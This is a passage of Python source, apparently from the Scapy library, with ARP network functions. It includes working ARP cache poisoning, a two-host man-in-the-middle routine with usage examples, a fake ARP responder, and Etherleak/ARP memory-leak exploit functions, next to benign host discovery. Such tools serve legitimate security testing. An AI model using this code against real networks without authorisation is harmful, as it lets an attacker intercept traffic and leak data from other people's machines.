        >>> arpcachepoison("192.168.0.2", ("192.168.0.1", get_if_hwaddr("virbr0")))
        >>> arpcachepoison("192.168.0.2", [("192.168.0.1", get_if_hwaddr("virbr0")),
        ...                                ("192.168.0.2", "aa:aa:aa:aa:aa:aa")])

    """
    single_target = isinstance(target, str)
    targets = Net(target) if single_target else target  # type: Union[Net, List[str]]  # noqa: E501
    # Plain address used to pick the route / outgoing interface
    str_target = target if single_target else target[0]

    if isinstance(addresses, str):
        local_mac = get_if_hwaddr(conf.route.route(str_target)[0])
        couple_list = [(addresses, local_mac)]
    elif isinstance(addresses, tuple):
        couple_list = [addresses]
    else:
        couple_list = addresses

    eth_dst = "ff:ff:ff:ff:ff:ff" if broadcast else None
    p = []  # type: List[Packet]
    for spoofed_ip, spoofed_mac in couple_list:
        p.append(
            Ether(src=spoofed_mac, dst=eth_dst) /
            ARP(op="who-has", psrc=spoofed_ip, pdst=targets,
                hwsrc=spoofed_mac, hwdst="00:00:00:00:00:00")
        )

    if count is not None:
        sendp(p, iface_hint=str_target, count=count, inter=interval, **kwargs)
        return
    try:
        while True:
            sendp(p, iface_hint=str_target, **kwargs)
            time.sleep(interval)
    except KeyboardInterrupt:
        # Ctrl-C is the normal way to stop the endless mode
        pass
@conf.commands.register
def arp_mitm(
    ip1,  # type: str
    ip2,  # type: str
    mac1=None,  # type: Optional[Union[str, List[str]]]
    mac2=None,  # type: Optional[Union[str, List[str]]]
    broadcast=False,  # type: bool
    target_mac=None,  # type: Optional[str]
    iface=None,  # type: Optional[_GlobInterfaceType]
    inter=3,  # type: int
):
    # type: (...) -> None
    r"""ARP MitM: poison 2 target's ARP cache

    :param ip1: IPv4 of the first machine
    :param ip2: IPv4 of the second machine
    :param mac1: MAC of the first machine (optional: will ARP otherwise)
    :param mac2: MAC of the second machine (optional: will ARP otherwise)
    :param broadcast: if True, will use broadcast mac for MitM by default
    :param target_mac: MAC of the attacker (optional: default to the interface's one)
    :param iface: the network interface. (optional: default, route for ip1)
    :param inter: interval passed to srploop() for the poisoning loop
    :raises OSError: when ip1 or ip2 could not be resolved to any MAC

    Example usage::

        $ sysctl net.ipv4.conf.virbr0.send_redirects=0  # virbr0 = interface
        $ sysctl net.ipv4.ip_forward=1
        $ sudo scapy
        >>> arp_mitm("192.168.122.156", "192.168.122.17")

    Alternative usages:
        >>> arp_mitm("10.0.0.1", "10.1.1.0/21", iface="eth1")
        >>> arp_mitm("10.0.0.1", "10.1.1.2",
        ...          target_mac="aa:aa:aa:aa:aa:aa",
        ...          mac2="00:1e:eb:bf:c1:ab")

    .. warning::
        If using a subnet, this will first perform an arping, unless broadcast is on!

    Remember to change the sysctl settings back..
    """
    if not iface:
        iface = conf.route.route(ip1)[0]
    if not target_mac:
        target_mac = get_if_hwaddr(iface)

    def _tups(ip, mac):
        # type: (str, Optional[Union[str, List[str]]]) -> Iterable[Tuple[str, str]]
        # Build the list of (ip, mac) pairs for one side of the MitM
        if mac is None:
            if broadcast:
                # ip can be a Net/list/etc and will be iterated upon while sending
                return [(ip, "ff:ff:ff:ff:ff:ff")]
            return [(x.query.pdst, x.answer.hwsrc)
                    for x in arping(ip, verbose=0)[0]]
        elif isinstance(mac, list):
            return [(ip, x) for x in mac]
        else:
            return [(ip, mac)]

    def _whohas(victims, peers, spoof_mac=None):
        # type: (Iterable[Tuple[str, str]], Iterable[Tuple[str, str]], Optional[str]) -> Iterable[Packet]  # noqa: E501
        # Yield who-has frames telling each victim where each peer's IP is:
        # at spoof_mac when given (poisoning), at the peer's own MAC
        # otherwise (restoring).
        for victim_ip, victim_mac in victims:
            for peer_ip, peer_mac in peers:
                hwsrc = peer_mac if spoof_mac is None else spoof_mac
                for x in (
                    Ether(dst=victim_mac, src=hwsrc) /
                    ARP(op="who-has", psrc=peer_ip, pdst=victim_ip,
                        hwsrc=hwsrc, hwdst="00:00:00:00:00:00")
                ):
                    yield x

    tup1 = _tups(ip1, mac1)
    if not tup1:
        raise OSError(f"Could not resolve {ip1}")
    tup2 = _tups(ip2, mac2)
    if not tup2:
        raise OSError(f"Could not resolve {ip2}")
    macs1 = [x[1] for x in tup1]
    macs2 = [x[1] for x in tup2]
    # Pure f-string: mixing it with %-formatting would treat any '%' in
    # iface or target_mac as a format directive.
    print(f"MITM on {iface}: {macs1} <--> {target_mac} <--> {macs2}")
    # We loop who-has requests
    srploop(
        list(itertools.chain(
            _whohas(tup1, tup2, target_mac),
            _whohas(tup2, tup1, target_mac),
        )),
        filter="arp and arp[7] = 2",
        inter=inter,
        iface=iface,
        timeout=0.5,
        verbose=1,
        store=0,
    )
    print("Restoring...")
    sendp(
        list(itertools.chain(
            _whohas(tup1, tup2),
            _whohas(tup2, tup1),
        )),
        iface=iface
    )
class ARPingResult(SndRcvList):
    """SndRcvList of ARP query/answer pairs with a tabular show()."""

    def __init__(self,
                 res=None,  # type: Optional[Union[_PacketList[QueryAnswer], List[QueryAnswer]]]  # noqa: E501
                 name="ARPing",  # type: str
                 stats=None  # type: Optional[List[Type[Packet]]]
                 ):
        SndRcvList.__init__(self, res, name, stats)

    def show(self, *args, **kwargs):
        # type: (*Any, **Any) -> None
        """
        Print the list of discovered MAC addresses.
        """
        rows = []
        width = 0
        for _, reply in self.res:
            vendor = conf.manufdb._get_short_manuf(reply.src)
            if vendor == reply.src:
                # The lookup returned the MAC itself: no known manufacturer
                vendor = "unknown"
            if len(vendor) > width:
                width = len(vendor)
            rows.append((reply[Ether].src, vendor, reply[ARP].psrc))

        # Second pass, once the widest manufacturer name is known
        for mac, vendor, ip in rows:
            print(" %-17s %-*s %s" % (mac, width, vendor, ip))
@conf.commands.register
def arping(net: str,
           timeout: int = 2,
           cache: int = 0,
           verbose: Optional[int] = None,
           threaded: bool = True,
           **kargs: Any,
           ) -> Tuple[ARPingResult, PacketList]:
    """
    Send ARP who-has requests to determine which hosts are up::

        arping(net, [cache=0,] [iface=conf.iface,] [verbose=conf.verb])

    Set cache=True if you want arping to modify internal ARP-Cache

    :param net: address or network to probe
    :param timeout: passed to srp()
    :param cache: when true, store every answer in the ARP cache
    :param verbose: verbosity; defaults to conf.verb when None
    :param threaded: passed to srp()
    :param kargs: forwarded to srp(); "iface" also selects the source MAC
    :returns: (answered, unanswered) as (ARPingResult, PacketList)
    """
    if verbose is None:
        verbose = conf.verb

    hwaddr = None
    if "iface" in kargs:
        hwaddr = get_if_hwaddr(kargs["iface"])
    r = conf.route.route(str(net), verbose=False)

    ans, unans = srp(
        Ether(dst="ff:ff:ff:ff:ff:ff", src=hwaddr) / ARP(
            pdst=net,
            psrc=r[1],
            hwsrc=hwaddr
        ),
        verbose=verbose,
        filter="arp and arp[7] = 2",
        timeout=timeout,
        threaded=threaded,
        iface_hint=net,
        **kargs,
    )
    # Always an ARPingResult from here on, so no None checks are needed
    ans = ARPingResult(ans.res)

    if cache:
        for pair in ans:
            _arp_cache[pair[1].psrc] = pair[1].hwsrc
    if verbose:
        ans.show()
    return ans, unans
@conf.commands.register
def is_promisc(ip, fake_bcast="ff:ff:00:00:00:00", **kargs):
    # type: (str, str, **Any) -> bool
    """Try to guess if target is in Promisc mode. The target is provided by its ip."""  # noqa: E501
    # A who-has sent to a MAC that is not the real broadcast address:
    # getting any answer is taken as a sign of promiscuous mode.
    probe = Ether(dst=fake_bcast) / ARP(op="who-has", pdst=ip)
    responses = srp1(
        probe,
        type=ETH_P_ARP,
        iface_hint=ip,
        timeout=1,
        verbose=0,
        **kargs
    )
    return responses is not None
@conf.commands.register
def promiscping(net, timeout=2, fake_bcast="ff:ff:ff:ff:ff:fe", **kargs):
    # type: (str, int, str, **Any) -> Tuple[ARPingResult, PacketList]
    """Send ARP who-has requests to determine which hosts are in promiscuous mode
    promiscping(net, iface=conf.iface)"""
    probe = Ether(dst=fake_bcast) / ARP(pdst=net)
    answered, unans = srp(
        probe,
        filter="arp and arp[7] = 2",
        timeout=timeout,
        iface_hint=net,
        **kargs
    )
    ans = ARPingResult(answered.res, name="PROMISCPing")

    # Unlike arping(), the result table is always printed
    ans.show()
    return ans, unans
class ARP_am(AnsweringMachine[Packet]):
    """Fake ARP Relay Daemon (farpd)

    example:
    To respond to an ARP request for 192.168.1.100 replying on the
    ingress interface::

      farpd(IP_addr='192.168.1.100',ARP_addr='00:01:02:03:04:05')

    To respond on a different interface add the interface parameter::

      farpd(IP_addr='192.168.1.100',ARP_addr='00:01:02:03:04:05',iface='eth0')

    To respond on ANY arp request on an interface with mac address ARP_addr::

      farpd(ARP_addr='00:01:02:03:04:05',iface='eth1')

    To respond on ANY arp request with my mac addr on the given interface::

      farpd(iface='eth1')

    Optional Args::

     inter=<n>   Interval in seconds between ARP replies being sent

    """

    function_name = "farpd"
    filter = "arp"
    send_function = staticmethod(sendp)

    def parse_options(self, IP_addr=None, ARP_addr=None, from_ip=None):
        # type: (Optional[str], Optional[str], Optional[str]) -> None
        """Store the machine options.

        String values of ``IP_addr`` and ``from_ip`` are wrapped in Net so
        that is_request() can use membership tests on them; any other value
        (None included) is stored untouched. ``ARP_addr`` is stored as is.
        """
        self.IP_addr = (
            Net(IP_addr) if isinstance(IP_addr, str) else IP_addr
        )  # type: Optional[Net]
        self.from_ip = (
            Net(from_ip) if isinstance(from_ip, str) else from_ip
        )  # type: Optional[Net]
        self.ARP_addr = ARP_addr

    def is_request(self, req):
        # type: (Packet) -> bool
        """Tell whether ``req`` is an ARP request this machine should answer.

        The packet must carry an ARP layer with op == 1, and its pdst/psrc
        must fall inside IP_addr/from_ip whenever those options are set.
        """
        if not req.haslayer(ARP):
            return False
        arp = req[ARP]
        if arp.op != 1:
            return False
        if self.IP_addr is not None and arp.pdst not in self.IP_addr:
            return False
        return self.from_ip is None or arp.psrc in self.from_ip

    def make_reply(self, req):
        # type: (Packet) -> Packet
        """Build the Ether / ARP "is-at" answer to ``req``.

        Also records the chosen output interface in ``self.iff`` for
        send_reply() and print_reply().
        """
        eth_req = req[Ether]
        arp_req = req[ARP]

        # An explicit 'iface' send option wins; otherwise the interface is
        # taken from the route towards the requester.
        if 'iface' not in self.optsend:
            out_iface, _addr, _gw = conf.route.route(arp_req.psrc)
        else:
            out_iface = cast(
                Union[NetworkInterface, str],
                self.optsend.get('iface')
            )
        self.iff = out_iface

        reply_mac = self.ARP_addr
        if reply_mac is None:
            # No MAC configured: answer with the interface's own address,
            # falling back to an all-zero MAC if it cannot be obtained.
            try:
                reply_mac = get_if_hwaddr(out_iface)
            except Exception:
                reply_mac = "00:00:00:00:00:00"

        eth_reply = Ether(dst=eth_req.src, src=reply_mac)
        arp_reply = ARP(
            op="is-at",
            hwsrc=reply_mac,
            psrc=arp_req.pdst,
            hwdst=arp_req.hwsrc,
            pdst=arp_req.psrc,
        )
        return eth_reply / arp_reply

    def send_reply(self, reply, send_function=None):
        # type: (Packet, Any) -> None
        """Send ``reply`` with the class send function.

        ``self.iff`` is supplied as the interface unless the send options
        already contain 'iface'. The ``send_function`` argument is not used
        by this implementation.
        """
        if 'iface' not in self.optsend:
            self.send_function(reply, iface=self.iff, **self.optsend)
            return
        self.send_function(reply, **self.optsend)

    def print_reply(self, req, reply):
        # type: (Packet, Packet) -> None
        """Print a one-line summary of the request, the reply and the
        interface recorded by make_reply()."""
        fields = (req.summary(), reply.summary(), self.iff)
        print("%s ==> %s on %s" % fields)
@conf.commands.register
def etherleak(target, **kargs):
    # type: (str, **Any) -> Tuple[SndRcvList, PacketList]
    """Exploit Etherleak flaw

    Sends Ether() / ARP(pdst=target) through srp() with an "arp" filter.
    For each answered pair, the padding layer of the received packet (when
    present) is passed through hexstr() by the ``prn`` callback.

    :param target: value used as the ARP ``pdst``
    :param kargs: extra keyword arguments forwarded to srp()
    :returns: whatever srp() returns
    """
    def _padding_as_hex(s_r):
        # s_r is a (sent, received) pair; only the received packet matters.
        received = s_r[1]
        if conf.padding_layer not in received:
            return False
        return hexstr(received[conf.padding_layer].load)

    return srp(
        Ether() / ARP(pdst=target),
        prn=_padding_as_hex,
        filter="arp",
        **kargs
    )
@conf.commands.register
def arpleak(target, plen=255, hwlen=255, **kargs):
    # type: (str, int, int, **Any) -> Tuple[SndRcvList, PacketList]
    """Exploit ARP leak flaws, like NetBSD-SA2017-002.

    https://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2017-002.txt.asc

    One ARP request per address generated from ``target`` is built with the
    given ``plen``/``hwlen`` values, the requests are sent per outgoing
    interface, and any bytes beyond the first 4 (psrc) or 6 (hwsrc) found
    in the answers are hex-dumped.

    :param target: value used as the ARP ``pdst``
    :param plen: value written to the ARP ``plen`` field
    :param hwlen: value written to the ARP ``hwlen`` field
    :param kargs: extra keyword arguments forwarded to srp()
    :returns: a tuple (answered, unanswered) accumulated over all
        interfaces
    """
    # We want explicit packets, grouped by the interface they leave from
    pkts_iface = {}  # type: Dict[str, List[Packet]]
    for pkt in ARP(pdst=target):
        # We have to do some of Scapy's work since we mess with
        # important values
        iface = conf.route.route(pkt.pdst)[0]
        local_ip = get_if_addr(iface)
        local_mac = get_if_hwaddr(iface)
        pkt.plen = plen
        pkt.hwlen = hwlen
        # With non-default lengths the addresses are stored as raw bytes
        # cut to the requested size.
        pkt.psrc = local_ip if plen == 4 else inet_aton(local_ip)[:plen]
        if plen != 4:
            pkt.pdst = inet_aton(pkt.pdst)[:plen]
        pkt.hwsrc = local_mac if hwlen == 6 else mac2str(local_mac)[:hwlen]
        bucket = pkts_iface.setdefault(iface, [])
        bucket.append(Ether(src=local_mac, dst=ETHER_BROADCAST) / pkt)

    ans, unans = SndRcvList(), PacketList(name="Unanswered")
    for iface, pkts in pkts_iface.items():
        ans_new, unans_new = srp(pkts, iface=iface, filter="arp", **kargs)
        ans += ans_new
        unans += unans_new
        # Re-apply the list names after each merge
        ans.listname = "Results"
        unans.listname = "Unanswered"

    # (field name, length we asked for, regular length of that address)
    checks = (("psrc", plen, 4), ("hwsrc", hwlen, 6))
    for _, rcv in ans:
        if ARP in rcv:
            arp_rcv = rcv[ARP]
            for fname, asked_len, regular_len in checks:
                raw = arp_rcv.get_field(fname).i2m(
                    arp_rcv, getattr(arp_rcv, fname)
                )
                # Anything past the regular address length is dumped
                if asked_len > regular_len and len(raw) > regular_len:
                    print(fname)
                    hexdump(raw[regular_len:])
                    print()
    return ans, unans